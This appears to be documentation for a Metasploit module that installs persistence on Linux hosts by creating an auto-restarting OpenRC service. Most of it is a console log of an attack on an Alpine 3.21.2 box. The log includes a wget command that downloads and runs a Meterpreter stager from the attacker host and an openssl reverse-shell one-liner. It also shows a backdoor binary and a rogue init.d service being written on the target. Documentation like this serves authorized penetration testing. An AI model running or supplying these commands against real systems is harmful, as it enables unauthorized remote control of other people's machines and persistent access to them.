## Vulnerable Application This module will create a service on the box via OpenRC, and mark it for auto-restart. We need enough access to write service files and potentially restart services. Verified against alpine 3.21.2 ## Verification Steps 1. Exploit a box and get a **root** session 2. `use exploit/linux/persistence/init_openrc ` 3. `set SESSION ` 4. `set PAYLOAD ` 5. `set LHOST ` 6. `exploit` ## Options ### WritableDir Remote writable directory to store the payload. Avoid using `/tmp` as it will be deleted upon reboot. ### SERVICE The name of the service to create. If not chosen, a random one is created. ### PAYLOAD_NAME The name of the file to write with our shell if a non-cmd payload is used. If not chosen, a random one is created. ## Scenarios ### Alpine Linux 3.21.2 Of note, the default install of Alpine doesn't have `curl`, or `bash`. The `OpenSSL` payload was confirmed working though Initial access vector via web delivery ``` [*] Processing /root/.msf4/msfconsole.rc for ERB directives. resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111 lhost => 111.111.1.111 resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload python/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set srvport 8181 srvport => 8181 resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4545 lport => 4545 resource (/root/.msf4/msfconsole.rc)> set URIPATH l URIPATH => l resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Starting persistent handler(s)... [*] Started reverse TCP handler on 111.111.1.111:4545 [*] Using URL: http://111.111.1.111:8181/l [*] Server started. [*] Run the following command on the target machine: wget -qO xK7yCqmS --no-check-certificate http://111.111.1.111:8181/l; chmod +x xK7yCqmS; ./xK7yCqmS& disown [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 222.222.2.222 [*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:33954) at 2025-02-09 09:31:16 -0500 [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... (Meterpreter 1)(/root) > getuid Server username: root (Meterpreter 1)(/root) > sysinfo Computer : alpine3.21.2 OS : (Linux 6.12.12-0-virt) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux (Meterpreter 1)(/root) > background [*] Backgrounding session 1... ``` Persistence ``` [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_openrc [*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp [msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set session 1 session => 1 [msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set payload payload/cmd/unix/reverse_openssl payload => cmd/unix/reverse_openssl [msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > exploit [+] sh -c '(sleep 4296|openssl s_client -quiet -connect 111.111.1.111:4444|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 111.111.1.111:4444 >/dev/null 2>&1 &)' [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [msf](Jobs:2 Agents:1) exploit(linux/persistence/init_openrc) > [*] Started reverse double SSL handler on 111.111.1.111:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. /tmp/ is writable and openrc based [*] Writing backdoor to /tmp//rljkrbglMY [*] Writing service: /etc/init.d/GpdAgZVBGWq [*] Writing '/etc/init.d/GpdAgZVBGWq' (141 bytes) ... [*] Enabling service [+] Starting service [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/alpine3.21.2_20250209.3159/alpine3.21.2_20250209.3159.rc [*] Command: echo duVbKHsRwQ5D05J7; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "duVbKHsRwQ5D05J7\n" [*] Matching... [*] A is input... [*] Command shell session 2 opened (111.111.1.111:4444 -> 222.222.2.222:43560) at 2025-02-09 09:32:07 -0500 ```